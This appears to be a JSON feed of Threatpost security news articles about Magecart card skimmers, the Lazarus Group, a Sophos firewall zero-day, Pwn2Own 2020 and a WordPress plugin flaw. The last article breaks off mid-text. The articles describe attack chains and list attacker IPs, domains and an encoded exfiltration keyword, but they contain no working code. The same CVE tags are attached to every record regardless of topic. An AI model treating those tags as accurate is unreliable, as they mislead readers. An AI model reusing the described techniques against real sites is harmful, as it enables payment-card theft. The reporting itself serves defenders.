"2020-10-15T22:17:16", "description": "The Lazarus Group, state-sponsored hackers affiliated with North Korea, has added digital payment-card skimming to their repertoire, researchers said, using Magecart code.\n\nLazarus members are targeting online payments made by American and European shoppers. Among the victims is Claire\u2019s, the fashion accessory chain that was attacked in June, according to an analysis from Sansec issued on Monday.\n\nResearchers said that the infrastructure used in the attacks is the same that has been seen in previous Lazarus operations; and that \u201cdistinctive patterns in the malware code were identified that linked multiple hacks to the same actor.\u201d\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThe analysis found that Lazarus was likely planting Magecart payment skimmers on major online retailer sites as early as May 2019. [Magecart](<https://threatpost.com/macys-data-breach-linked-to-magecart/150393/>) is an umbrella term encompassing several different threat groups who typically use the same card-skimming scripts on checkout pages. Magento-based attacks are seen most often, but Magecart also attacks other e-commerce platforms, including Opencart, BigCommerce, Prestashop and Salesforce.\n\n\u201cIn order to intercept transactions, an attacker needs to modify the computer code that runs an online store,\u201d according to [the writeup](<https://sansec.io/research/north-korea-magecart>). \u201c[Lazarus Group, a.k.a. Hidden Cobra] managed to gain access to the store code of large retailers such as [international fashion chain Claire\u2019s](<https://threatpost.com/claires-customers-magecart-payment-card-skimmer/156552/>).\u201d\n\nThe researchers speculated that Lazarus is using spearphishing emails as its initial infection vector to compromise the sites \u2013 an effort ultimately aimed at obtaining the passwords of retail staff. The hackers then use that access to inject the skimming script, which captures information that shoppers enter into e-commerce check-out pages. The data is then sent to hacker-controlled servers via a global exfiltration network.\n\n\u201cThis network utilizes legitimate sites, that got hijacked and repurposed to serve as disguise for the criminal activity,\u201d explained the firm. \u201cThe network is also used to funnel the stolen assets so they can be sold on dark web markets. Sansec has identified a number of these exfiltration nodes, which include a modeling agency from Milan, a vintage music store from Tehran and a family-run book store from New Jersey.\u201d\n\nResearchers uncovered the ongoing campaign last summer, when the firm discovered a skimmer on a U.S. truck-parts store that used the compromised Italian modeling site to harvest payment data. During the following months, they discovered the same uniquely encoded malware on several dozen stores, all using the same hijacked sites as loaders and card collectors.\n\nResearchers identified multiple, independent links between recent skimming activity and previously documented North Korean hacking operations. These include shared infrastructure (including the domain registrar and DNS service, and common loader sites), as well as an odd code snippet, that Sansec has not observed anywhere else.\n\n\u201cThe injected script customize-gtag.min.js12 is scrambled with a popular Javascript obfuscator13. Hidden in the code, the string WTJ4cFpXNTBWRzlyWlc0OQ== is found, which is the double-base64 encoded representation of clientToken=,\u201d according to the analysis. \u201cThis particular keyword is later used as HTTP GET parameter to send the stolen payload to the collector exfiltration node. The specific encoding and the attempt to disguise the stolen payload as \u2018clientToken\u2019 form a uniquely identifying characteristic.\u201d\n\nThere are also common behavior patterns such as adding a hidden, dynamic image to the page with the deceptive name (__preloader). The image address is controlled by the attacker, and the intercepted and encoded payload is sent as argument to this image, along with several random numbers.\n\n\u201cDoes the usage of common loader sites, and the similarity in time frame, prove that the DPRK-attributed operations are run by the same actor as the skimming operations?\u201d the researchers said. \u201cTheoretically, it is possible that different nefarious actors had simultaneous control over the same set of hijacked sites, but in practice, this would be extremely unlikely. First, thousands of sites get hacked each day, making an overlap highly coincidental. Secondly, when a site gets hacked, it is common practice for a perpetrator to close the exploited vulnerability after gaining access, in order to shield the new asset from competitors.\u201d\n\nNorth Korean hacking activity is [aimed at both espionage](<https://threatpost.com/u-s-ties-lazarus-to-north-korea-and-major-hacking-conspiracy/137264/>) as well as making money for the regime; and Sansec pointed out that the move into digital skimming represents a significant expansion.\n\n\u201c[North Korea-backed attacks were] mostly restricted to banks and [South Korean crypto markets](<https://threatpost.com/lazarus-tactics-cryptocurrency-attacks/143249/>), covert cyber operations that earned hackers $2 billion, according to a 2019 United Nations report,\u201d concluded the report. \u201cAs Sansec\u2019s new research shows, they have now extended their portfolio with the profitable crime of digital skimming.\u201d\n\n**_BEC and enterprise email fraud is surging, but DMARC can help \u2013 if it\u2019s done right. On July 15 at 2 p.m. ET, join Valimail Global Technical Director Steve Whittle and Threatpost for a _**[**_FREE webinar_**](<https://attendee.gotowebinar.com/register/441045308082589963?source=art>)**_, \u201cDMARC: 7 Common Business Email Mistakes.\u201d This technical \u201cbest practices\u201d session will cover constructing, configuring, and managing email authentication protocols to ensure your organization is protected. _**[**_Click here to register_**](<https://attendee.gotowebinar.com/register/441045308082589963?source=art>)**_ for this Threatpost webinar, sponsored by Valimail._**\n", "cvss3": {}, "published": "2020-07-06T17:18:59", "type": "threatpost", "title": "Lazarus Group Adds Magecart to the Mix", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-24400", "CVE-2020-24407"], "modified": "2020-07-06T17:18:59", "id": "THREATPOST:1ACF78FAC848A424ADE5DEE520B43051", "href": "https://threatpost.com/lazarus-group-adds-magecart/157167/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-15T22:21:57", "description": "Researchers have observed a new skimmer from the prolific Magecart Group that has been actively harvesting payment-card data from 19 different victim websites, mainly belonging to small- and medium-sized businesses (SMBs), for several months.\n\n[RiskIQ](<https://www.riskiq.com/>) researchers first discovered the skimmer, dubbed MakeFrame for its use of iframes to skim data, on Jan. 24. Since then, they\u2019ve captured several different versions of the skimmer with \u201cvarious levels of obfuscation,\u201d researchers Jordan Herman and Mia Ihm wrote in a blog post published Thursday.\n\nThe versions range from from development versions in clear code to finalized versions using encrypted obfuscation, they wrote.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cThis version of the skimmer is the classic Magecart blob of hex-encoded terms and obfuscated code,\u201d Herman and Ihn wrote. \u201cIt is nestled in amongst benign code to blend in and avoid detection.\u201d\n\nMakeFrame also leeches off the compromised site for its functionality, a technique that in particular alerted researchers that MakeFrame is most likely the work of Magecart Group 7. And, targeting SMB sites, as MakeFrame does, also is indicative of Magecart Group 7 activity, researchers said.\n\n\u201cIn some cases, we\u2019ve seen MakeFrame using compromised sites for all three of its functions \u2014 hosting the skimming code itself, loading the skimmer on other compromised websites and exfiltrating the stolen data,\u201d Herman and Ihm wrote.\n\nIndeed, Magecart Group 7 typically uses victim sites for skimmer development, which was also observed when the group [compromised OXO](<https://threatpost.com/data-exposed-oxo-amazon-mongodb/140802/>) in 2017 and in activity by the group in 2018, researchers wrote.\n\n\u201cIn all of these cases, the skimmer is hosted on the victim domain,\u201d according to the analysis. \u201cThe stolen data is posted back to the same server or sent to another compromised domain.\u201d\n\nAnother aspect of MakeFrame that links the new skimmer back to Magecart Group 7 is its method of exfiltration of data once it\u2019s stolen, Herman and Ihm noted. The skimmer sends stolen data in the form of .PHP files to other compromised sites for exfiltration, they said.\n\n\u201cEach compromised site used for data exfil has also been injected with a skimmer and has been used to host skimming code loaded on other victim sites as well,\u201d the researchers added.\n\nMagecart Group 7 is one of a number of threat actors operating under the [Magecart](<https://threatpost.com/macys-data-breach-linked-to-magecart/150393/>) umbrella, which includes several different groups who all use a similar attack vector. [Magecart attacks](<https://threatpost.com/magecart-variant-tactics-mitm-phishing/150628/>) compromise websites \u2014 principally built on the Magento e-commerce platform \u2013 to inject card-skimming scripts on checkout pages to steal customer payment-card details and other data entered on the page\u2019s fields.\n\nThe group has been active since 2016 and consistently switches tactics to target e-commerce platforms to steal people\u2019s payment and other credentials.\n\n[Skimmers](<https://threatpost.com/macys-data-breach-linked-to-magecart/150393/>) are the primary weapons of choice for the various Magecarts groups, but they have also engaged in other nefarious activities such as [brute-forcing passwords](<https://threatpost.com/magecart-cybergang-targets-0days-in-third-party-magento-extensions/138547/>), [spoofing third-party payment site](<https://threatpost.com/rooster-teeth-attack-magecart/151216/>)s and even targeting [Wi-Fi routers](<https://threatpost.com/magecart-group-targets-routers-behind-public-wi-fi-networks/148662/>) with malicious code to steal customer data.\n\nThe latest skimmer uncovered by RiskIQ shows the group\u2019s \u201ccontinued evolution, honing tried-and-true techniques and developing new ones all the time,\u201d researchers wrote.\n\nThe onset of stay-at-home orders amid the [COVID-19 pandemic](<https://threatpost.com/who-attacked-possible-apt-covid-19-cyberattacks-double/154083/>) also seems to have inspired Magecart to bolster activity as more people conduct business online, with many brick-and-mortar shops and shopping malls closed, researchers noted.\n\n\u201cRiskIQ data shows Magecart attacks have grown 20 percent amid the COVID-19 pandemic,\u201d Herman and Ihm wrote. \u201cWith many home-bound people forced to purchase what they need online, the digital-skimming threat to e-commerce is as pronounced as ever.\u201d\n\n[](<https://attendee.gotowebinar.com/register/7732731543372035596?source=art>)\n\n_**Do you suffer from Password Fatigue? On [Wednesday April 8 at 2 p.m. ET](<https://attendee.gotowebinar.com/register/7732731543372035596?source=art>) join **_**_Duo Security and Threatpost as we explore a [passwordless](<https://attendee.gotowebinar.com/register/7732731543372035596?source=art>) future. This [FREE](<https://attendee.gotowebinar.com/register/7732731543372035596?source=art>) webinar maps out a future where modern authentication standards like WebAuthn significantly reduce a dependency on passwords. We\u2019ll also explore how teaming with Microsoft can reduced reliance on passwords. [Please register here](<https://attendee.gotowebinar.com/register/7732731543372035596?source=art>) and dare to ask, \u201c[Are passwords overrated?](<https://attendee.gotowebinar.com/register/7732731543372035596?source=art>)\u201d in this sponsored webinar. _**\n", "cvss3": {}, "published": "2020-04-02T13:10:33", "type": "threatpost", "title": "Emerging MakeFrame Skimmer from Magecart Sets Sights on SMBs", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-24400", "CVE-2020-24407"], "modified": "2020-04-02T13:10:33", "id": "THREATPOST:D000B56E417D094837C498C6A759A338", "href": "https://threatpost.com/emerging-makeframe-skimmer-magecart-smbs/154374/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-15T22:20:50", "description": "Attackers have been targeting the Sophos XG Firewall (both physical and virtual versions) using a zero-day exploit, according to the security firm \u2013 with the ultimate goal of dropping the Asnarok malware on vulnerable appliances.\n\nSophos said [in a posting](<https://community.sophos.com/kb/en-us/135412>) updated on Monday that the bug in question is a pre-authentication SQL injection vulnerability (a CVE is forthcoming) that leads to remote code execution (RCE). It affects systems configured with either the administration interface (called the \u201cHTTPS admin service\u201d) or the user portal exposed to the WAN zone.\n\n\u201cIn addition, firewalls manually configured to expose a firewall service (e.g. SSL VPN) to the WAN zone that shares the same port as the admin or user portal were also affected,\u201d the firm explained. \u201cFor reference, the default configuration of XG Firewall is that all services operate on unique ports.\u201d\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nIf hackers were able to access an exposed XG device, the Asnarok trojan was then installed, which is designed to exfiltrate data housed on the XG firewall itself. Sophos said that the sample is an ELF binary executable malware that has been specifically compiled for a firewall operating system.\n\n\u201cThe data exfiltrated for any impacted firewall includes all local usernames and hashed passwords of any local user accounts,\u201d Sophos noted. \u201cFor example, this includes local device admins, user portal accounts and accounts used for remote access. Passwords associated with external authentication systems such as Active Directory (AD) or LDAP were not compromised.\u201d\n\nSophos issued a hotfix this week for the issue.\n\n## **Initial Compromise: A Chain of Linux Scripts**\n\nThe attack consists of a chain of Linux shell scripts, the firm said, hosted on an innocuous-sounding yet malicious domain, sophosfirewallupdate[.]com.\n\n\u201cThere was significant orchestration involved in the execution of the attack,\u201d according to Sophos.\n\nThe kill chain begins with the SQL injection exploit, which allows the attackers to insert a one-line command into a database table on a targeted device, according to a Sunday [technical analysis](<https://news.sophos.com/en-us/2020/04/26/asnarok/>) from Sophos. That injected command triggers a download of the first Linux shell script, named Install.sh, from the remote server.\n\nThis shell is written to the appliance as \u201cx.sh\u201d and is also placed in the /tmp directory. This turns out to be an installer script that goes on to drop two completely new shell scripts, and it also modifies an existing operating-system script in a bid for persistence.\n\nThe first of the new shell scripts is named .lp.sh installed by x.sh connects to the sophosfirewallupdate site, to download a Linux ELF executable file, named lp. Ip is also written to /tmp with a filename of b.\n\n\n\nThe firewall attack kill chain. Click to enlarge.\n\n\u201cThe b program, when run, deletes itself from the filesystem of the device, so it is only present in memory,\u201d Sophos explained. \u201cThen, it repeats a series of tasks every three to six hours.\u201d\n\nThe first of these tasks is to connect to the IP address 43.229.55.44. If that fails, it tries the malicious domain sophosproductupdate[.]com. If successful, then downloads another Linux ELF executable called Sophos.dat.\n\nThe second of the dropped shell scripts is written to the /tmp directory with a filename of .pg.sh. It goes on to download a second, different ELF executable, called bk on the webserver and written to the filesystem with the name .post_MI.\n\nThe initial Install.sh script also runs a number of Postgres SQL commands to modify or zero out the values of certain tables in the database, Sophos noted. One of these commands modifies a specific service value entry so that .post_MI executes whenever that service executed.\n\n\u201cThe Install.sh script\u2026modified at least one shell script that is part of the firewall\u2019s operating system to add a set of commands to the end of the script,\u201d according to the writeup. \u201cThis last script, in particular, is relevant because the malware modified services to ensure it ran every time the firewall booted up; it served as a roundabout persistence mechanism for the malware.\u201d\n\n## **Asnarok Trojan: Stealing XG Firewall Data**\n\nThe file called Sophos.dat, saved to the filesystem as 2own, is actually the ultimate payload in the kill chain \u2013 the Asnarok trojan, first detailed in the Sophos analysis this weekend.\n\n\u201cThis malware\u2019s primary task appeared to be data theft, which it could perform by retrieving the contents of various database tables stored in the firewall, as well as by running some operating system commands,\u201d according to Sophos research.\n\nAsnarok first retrieves the public-facing IP address where the firewall was installed, using public search engines like \u201cifconfig.me\u201d and \u201ccheckip.dyndns.org.\u201d Next, it retrieves information about the firewall and its users from different storage areas on the firewall.\n\nSophos said that this data includes: The firewall\u2019s license and serial number; a list of the email addresses of user accounts that were stored on the device; the primary email belonging to the firewall\u2019s administrator account; firewall users\u2019 names, usernames, encrypted passwords and the salted SHA256 hash of the administrator account\u2019s password; a list of the user IDs permitted to use the firewall for SSL VPN; and a list of accounts permitted to use a \u201cclientless\u201d VPN connection.\n\nThe malware also gathered data on the appliance itself: The version of the operating system; the type of CPU and amount of memory present on the device; how long it has been operational since the last reboot (the \u2018uptime\u2019); and the output of the \u201cifconfig\u201d and \u201cARP\u201d tables, Sophos said.\n\nThe data is collected into a temporary file on the firewall with the name Info.xg, compressed, encrypted with OpenSSL and then earmarked for upload to the IP address 38.27.99.69. In a final step, Asnarok deletes the files that it temporarily created while it collected the information.\n\nThe firm said that it hasn\u2019t seen evidence that the collected data was successfully exfiltrated from victimized systems. Threatpost has reached out for more information on the number of targeted systems and any other information about the scope of the attack.\n\nUsers that don\u2019t have automatic updates enabled on their firewalls [can enable them](<https://community.sophos.com/kb/en-us/135415>) in order to receive the hotfix. Sophos meanwhile said that it has blocked the domains and IP addresses associated with the campaign.\n\n**_Inbox security is your best defense against today\u2019s fastest growing security threat \u2013 phishing and Business Email Compromise attacks. [On May 13 at 2 p.m. ET](<https://register.gotowebinar.com/register/5064791868226032141?source=ART>), join Valimail security experts and Threatpost for a FREE webinar, [5 Proven Strategies to Prevent Email Compromise](<https://register.gotowebinar.com/register/5064791868226032141?source=ART>). Get exclusive insights and advanced takeaways on how to lockdown your inbox to fend off the latest phishing and BEC assaults. Please [register here ](<https://register.gotowebinar.com/register/5064791868226032141?source=ART>)for this sponsored webinar._**\n", "cvss3": {}, "published": "2020-04-27T16:16:14", "type": "threatpost", "title": "Hackers Mount Zero-Day Attacks on Sophos Firewalls", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-24400", "CVE-2020-24407"], "modified": "2020-04-27T16:16:14", "id": "THREATPOST:66B6758B39EA6566B84928992AF3085C", "href": "https://threatpost.com/hackers-zero-day-attacks-sophos-firewalls/155169/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-15T22:27:19", "description": "The online store for the Rooster Teeth video-streaming service has been hit with a malicious web redirect attack by Magecart, which allowed the cybercriminals to harvest users\u2019 payment-card details. The attack marks a slight departure from the group\u2019s typical tactics.\n\nRooster Teeth, which offers original podcasts, animated shows and short-form content aimed at Millennials, gamers and geeks, said that the attack happened on December 2. According to a company website notice, it was able to detect the issue the same day.\n\n\u201cThe malicious code directed users entering a checkout on the site to a spoofed webpage where they were asked to enter payment-card details in order to complete their purchases,\u201d [the Rooster Teeth notice](<https://blog.roosterteeth.com/notice-of-data-breach/>) explained. \u201cThis was inserted after the stage at which users entered their shipping data. Users who completed the payment-card details page were then directed to the real webpage, where they were asked to complete the forms again.\u201d\n\n[Magecart](<https://threatpost.com/macys-data-breach-linked-to-magecart/150393/>) is an umbrella term encompassing several different threat groups who typically use the same modus operandi: They compromise websites (mainly built on the Magento e-commerce platform) in order to inject card-skimming scripts on checkout pages. But the Magecart crooks behind this attack mixed up their tactics for this incident, according to Elad Shapira, head of research at Panorays.\n\n\u201cThe recent Rooster Teeth data breach illustrates how the Magecart threat continues to evolve while often targeting organizations through their third parties,\u201d he said via email. \u201cIn this case, malicious code introduced on the company\u2019s Shopify-based online store directed users to a fake payment page, where they were asked to enter their credit-card information. But it also points to good news, which is that companies are clearly beginning to take this threat seriously. It\u2019s encouraging that Rooster Teeth\u2019s IT team was able to discover and remove the malicious code on the same day it was introduced. Organizations can learn from this example, and should be sure to put processes in place to manage and review susceptibility to the Magecart threat through third-parties.\u201d\n\nThe issue affected the Rooster Teeth online store, where the company offers various kinds of clothing and other merchandise. Rooster Teeth free streaming accounts and its \u201cFIRST\u201d subscription memberships weren\u2019t impacted, the company said.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2019/12/17153707/rooster-teeth-e1576615039820.jpg>)The spoofed page collected name, email address, telephone number, physical address, and/or payment-card information (including expiration dates and security codes). The company said that it sent data-breach notices to customers who were caught up in the attack.\n\n\u201cWe removed the malicious code from the Site and took other steps to secure the site against further unauthorized access,\u201d the company said. \u201cThe incident did not affect any other part of the site or other information maintained by us. It is our goal to provide a safe and secure shopping environment, and we will continue to review, audit, and improve our security controls and processes.\u201d\n\nMike Bittner, director of digital security and operations at The Media Trust, noted that the attack underscores the ongoing rise of digital supply-chain attacks.\n\n\u201cUntil companies take the insecurity of their digital supply chains seriously and monitor the code that runs on their sites, these attacks will continue,\u201d he said. \u201cThere\u2019s no other way to prevent these attacks than to allow only trusted digital vendors to run code on your site, as well as closely watch and regulate all the code that these vendors and their own digital third parties run to make sure they all follow your policies. By doing so, you will address not only security risk but also quality and performance risks that can degrade the site\u2019s user experience.\u201d\n", "cvss3": {}, "published": "2019-12-17T20:51:21", "type": "threatpost", "title": "Rooster Teeth Attack Showcases New Magecart Approach", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-24400", "CVE-2020-24407"], "modified": "2019-12-17T20:51:21", "id": "THREATPOST:26D5939EFE0BD9FACA470F9A3D547398", "href": "https://threatpost.com/rooster-teeth-attack-magecart/151216/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-15T22:25:01", "description": "UPDATE\n\nA faction of the Magecart threat group, Magecart group 12, has been linked to a recent digital card skimmer attack bent on stealing payment data from a slew of websites, including ones selling anything from Olympic tickets to emergency preparation kits.\n\nOver the past few weeks, the group has targeted two ticket sales websites \u2013 one called [Olympic Tickets](<http://olympictickets2020.com>) is a re-seller of tickets to the upcoming 2020 summer Olympic games and the second, [Euro 2020 Tickets](<http://eurotickets2020.com>), is selling tickets for the 2020 UEFA, a European football championship that takes place in June. Researchers also found the group\u2019s same skimming code (being loaded from a different domain) used to target popular emergency preparedness sites; [BePrepared.com](<http://beprepared.com>), which sells survival kits and gear, and [Augason Farms](<http://augasonfarms.com>), which sells emergency food supplies.\n\n\u201cThese sites were compromised by a skimmer using the domain OpenDoorCDN.com for data exfiltration,\u201d said Jordan Herman, threat researcher with RiskIQ in a Friday analysis. \u201cResearch by RiskIQ turned up several other compromised sites \u2013 some ranked within the Alexa top-200,000 \u2013 loading skimming code from storefrontcdn.com.\u201d\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nResearchers [Max Kersten](<https://maxkersten.nl/2020/01/20/ticket-resellers-infected-with-a-credit-card-skimmer/>) and [Jacob Pimental](<https://www.goggleheadedhacker.com/blog/post/14>) first became aware of the infection of the Olympic and UEFA ticket sale websites Jan. 17, after finding web skimming script on both of their check-out pages. While it\u2019s unclear how long the malicious script was on these two websites, the researchers estimate it may have been as long as 50 days, since the skimmer for both was first indexed Dec. 3, 2019. The skimmer has since been removed, they said. These sites were loading skimming code from the domain opendoorcdn.com.\n\nMeanwhile, the websites of both BePrepared.com and Augason Farms, which are owned by Blue Chip Group Manufacturing, were infected by the skimming code between Jan. 16 to Jan. 19, RiskIQ researchers said. The skimming code affecting these two sites was loaded from a different domain, storefrontcdn.com. These two sites have also since removed the code. Researchers said they don\u2019t have indication how many people were impacted by this wave of card skimmer attacks; however, BePrepared.com is currently ranked by Alexa at 129,204 globally and 26,238 in the U.S. Augasonfarms.com meanwhile is ranked 100,908 globally and 17,793 in the U.S.\n\nBased on the skimming code and obfuscation techniques used, researchers were able to link this attack back to Magecart Group 12, one of several groups operating under the [Magecart umbrella](<https://threatpost.com/podcast-breaking-down-the-magecart-threat-part-two/139534/>). [Magecart](<https://threatpost.com/podcast-breaking-down-the-magecart-threat-part-two/139534/>), which has made headlines over the past year or so for high-profile breaches of companies like [VisionDirect](<https://threatpost.com/visiondirect-blindsided-by-magecart-in-data-breach/139223/>), [Ticketmaster](<https://threatpost.com/ticketmaster-breach-just-one-part-of-a-wide-ranging-campaign/133892/>) and more, is known for its use of web-based, digital card skimmers, Magecart uses scripts injected into websites to steal data that\u2019s entered into online payment forms on e-commerce websites directly or through compromised third-party suppliers used by these sites.\n\nThe specific group in question, Magecart Group 12, has also been responsible for attacks on a [Paris-based advertising company, Adverline](<https://www.riskiq.com/blog/labs/magecart-adverline/>). This most recent campaign utilized similarities to Group 12\u2019s previous skimming attacks, along with some new updates.\n\n## New Tactics\n\nIn previous campaigns, Group 12 used Base64 encoded checks against the URLs of websites, looking for the words like \u201ccheckout\u201d to identify the payment page. However, this technique was dropped in this most recent campaign, and the script instead was loaded via a variable under the alias of \u201cEventsListenerPool.\u201d Herman told Threatpost while he\u2019s not positive why Magecart used this tactic, they may have changed things up to avoid detection.\n\n\u201cWhat has changed is how [Magecart attackers] get the compromised page to load that obfuscated skimming script. Previously, we would see an obfuscated piece of code on the compromised page that checks the URL for the word \u2018checkout\u2019 before loading the skimmer,\u201d RiskIQ told Threatpost. \u201cIn these recent compromises, there is no obfuscated code inserted on the compromised page and no URL check, instead, they opted for a simple, non-obfuscated bit of code on the compromised page which caused the above skimming script to load.\u201d\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2020/02/06160657/magecart.png>)Attackers in this most recent campaign also worked to quickly swap out domains from which they had loaded the skimming code. After researchers had identified OpenDoorCDN.com (registered since January 2019) on compromised websites, the domain was replaced by another, TopLevelStatic.com (registered Feb. 1 through a Chinese registrar), for instance.\n\n\u201cMagecart groups generally use many different domains for their skimmers and data exfiltration,\u201d RiskIQ told Threatpost. \u201cThis allows them to avoid detection because it is difficult to blacklist every one of their domains or get them taken down by their hosting providers. This is the first time I have directly observed a group swapping out skimming domains on compromised sites due to a takedown, but I expect it is not uncommon and shows how slippery Magecart can be.\u201d\n\nThese domains use the same DNS provider, DNSPod, based in China, researchers said, and both are hosted on NGINX servers and use Let\u2019s Encrypt certs. The IPs connected to TopLevelStatic.com have changed at least once a day, with each server, so far, based in Russia, they said. Skimming code is still being loaded from TopLevelStatic.com, Herman told Threatpost.\n\n\u201cThe activity seen here demonstrates that Magecart is a persistent and resilient threat that requires constant vigilance in order to protect against it,\u201d RiskIQ researchers said.\n\n_This article was updated at 12pm ET on Friday to clarify that the domain behind the skimming code on the Olympic ticket reseller websites was different than the one affecting the prepping sites. _\n\n_**Learn how Operational Technology and Information Technology systems are merging and changing security playbooks in this free Threatpost Webinar. Join us [Wednesday, Feb. 19 at 2 p.m. ET](<https://attendee.gotowebinar.com/register/2652328115100076035?source=art>) when a panel of OT and IT security experts will discuss how this growing trend is shaping security approaches for IoT and 5G rollouts. This webinar is for security and DevOps engineers, IoT edge developers and security executives.**_\n", "cvss3": {}, "published": "2020-02-07T11:00:01", "type": "threatpost", "title": "Magecart Gang Attacks Olympic Ticket Reseller and Survival Food Sites", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-24400", "CVE-2020-24407"], "modified": "2020-02-07T11:00:01", "id": "THREATPOST:3F0E45B1EBB975331C1ED9FCA486E4BE", "href": "https://threatpost.com/olympic-ticket-survival-sites-hit-by-cyberattack/152648/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-15T22:22:32", "description": "[](<https://media.threatpost.com/wp-content/uploads/sites/103/2020/03/20154132/Mat-Powell.png>)Covid-19 has brought the world to grinding halt, but for the [hacking competition Pwn2Own](<https://www.zerodayinitiative.com/blog/2020/3/17/welcome-to-pwn2own-2020-the-schedule-and-live-results>), that wasn\u2019t the case. The event, planned for CanSecWest this week in Vancouver, went virtual along with the conference itself. Faced with travel restrictions and new social-distancing guidelines, contestants virtually assembled via the teleconferencing platform Zoom from Africa, Singapore and across the Americas.\n\n\u201cWe were monitoring the situation. And if we weren\u2019t going to converge in Vancouver, our first priority was remote participation,\u201d said Dustin Childs, communications manager for Zero Day Initiative (ZDI), the event organizer. \u201cWe had to come up quickly with how to get everyone together in the right ways in the right rooms with the right access. It was tough, but we managed to do it.\u201d\n\nOver the course of two days, hacking teams ranging from Flourescence, RedRocket CTF and Synacktiv attempted to hack Adobe\u2019s Acrobat Reader and Apple\u2019s macOS and virtualization platforms such as Oracle VirtualBox. They competed for close to $300,000 in prizes \u2013 and for one talented hacking group, the bragging rights of Master of Pwn.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nTuning into the competition via Zoom, judges and technical teams coordinated with white-hat hackers who in real time mostly were successful in compromising targeted devices and software.\n\nDuring one hacking attempt, the Fluoroacetate team of Amat Cama and Richard Zhu, targeted Adobe Reader and then Windows with a local privilege escalation attack. Blink an eye and you might have missed the hack \u2013 in under five seconds and one mouse click, on their first attempt, team Fluoroacetate compromised Adobe Reader to attack and take control of the underlying operating system, Windows 10.\n\nMore specifically, the team used two separate use-after-free bugs, one in Adobe and one in the Windows kernel.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2020/03/20153823/pwn2own_zoom.png>)\n\n\u201cThe only thing they did was open a PDF. So, that\u2019s something we all do every day. And, from that, they were able to escape the sandbox in Adobe Reader and escalate through the Windows\u2019 kernel \u2013 taking over the entire machine just by opening a PDF,\u201d Childs said.\n\nFor the one-click hack, team Fluoroacetate earned $50,000.\n\nTensions were high on Wednesday when a team from Georgia Tech Systems Software and Security Lab pulled off a high-wire hack chaining six different vulnerabilities to successfully exploit Apple\u2019s Safari browser and execute code (launch the calculator app) on a computer running macOS.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2020/03/20152802/ETfuzxHXkAIToYy.jpg>)For the Georgia Tech team, which consisted of Yong Hwi Jin ([@jinmo123](<https://twitter.com/jinmo123>)), Jungwon Lim ([@setuid0x0_](<https://twitter.com/setuid0x0_>)), and Insu Yun ([@insu_yun_en](<https://twitter.com/insu_yun_en>)), the hack earned them $70,000.\n\nThings didn\u2019t go so well for The Synacktiv team of Corentin Bayet (@OnlyTheDuck) and Bruno Pujos (@BrunoPujos) who targeted a VMware Workstation in the Virtualization category. Over the course of three attempts, three big sighs of disappointment punctuated the failed attacks. The hack was successful eventually, however not within the contest\u2019s rules of three tries within timed sessions.\n\nVisualized applications didn\u2019t fare as well against Phi Ph\u1ea1m H\u1ed3ng (@4nhdaden) of STAR Labs who savaged Oracle\u2019s VirtualBox on his third try. Using a combo out-of-band read vulnerability, info leak bug and an un-initialized variable hack, H\u1ed3ng successfully executed code on the VirtualBox hypervisor.\n\nFor their efforts H\u1ed3ng\u2019s STAR Labs earned $40,000.\n\nThe title Master of Pwn was awarded to team Fluoroacetate for its stellar hacks during the event. With the title also comes $25,000, the classic Pwn2Own jerseys and of course the Master of Pwn trophy.\n\n\u201cIt ended up being a great contest under very stressful trying circumstances,\u201d Childs said. \u201cBut it was great that the vendors came together with the contestants and our team pulled it off. It was a great thing that we were able to still put it on.\u201d\n\nFor complete Pwn2Own results ZDI has [posted them here](<https://www.zerodayinitiative.com/blog/2020/3/20/pwn2own-day-two-results-and-master-of-pwn>).\n", "cvss3": {}, "published": "2020-03-20T20:03:37", "type": "threatpost", "title": "Defying Covid-19\u2019s Pall: Pwn2Own Goes Virtual", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-24400", "CVE-2020-24407"], "modified": "2020-03-20T20:03:37", "id": "THREATPOST:EDFFF959759E1951E67CA4BC4A8FAF1E", "href": "https://threatpost.com/defying-covid-19s-pall-pwn2own-goes-virtual/154002/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-15T22:24:20", "description": "Researchers are urging users of a vulnerable WordPress plugin, ThemeGrill Demo Importer, to update as soon as possible after discovering attackers are actively exploiting a flaw in the plugin.\n\nThe [ThemeGrill Demo Importer](<https://wordpress.org/plugins/themegrill-demo-importer/>) plugin is owned by ThemeGrill, which offers various templates for website outlines. This WordPress plugin helps users import and manage ThemeGrill templates on their sites. As of [last week,](<https://webcache.googleusercontent.com/search?q=cache:kTHL3xHA_oUJ:https://wordpress.org/plugins/themegrill-demo-importer/+&cd=1&hl=en&ct=clnk&gl=ee>) the plugin had 200,000 active installations. According to WebARX, [who discovered the flaw](<https://www.webarxsecurity.com/critical-issue-in-themegrill-demo-importer/>), on Tuesday that number has dipped to 100,000 installs. It is unclear at this time what accounts for the drop in the number of WordPress plugin installs.\n\nResearchers disclosed a flaw in the plugin this week, which allows unauthenticated, remote attackers to execute some administrator functions \u2013 without checking if they are an administrator. One such function is the capability to wipe the entire database of the vulnerable website, bringing it to its default state and clearing website databases of existing posts and user roles. And, after carrying out this action, an attacker would also then be logged in as an administrator \u2013 giving them complete control over the website.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cThis is a serious vulnerability and can cause a significant amount of damage,\u201d according to WebARX researchers in a post this week. 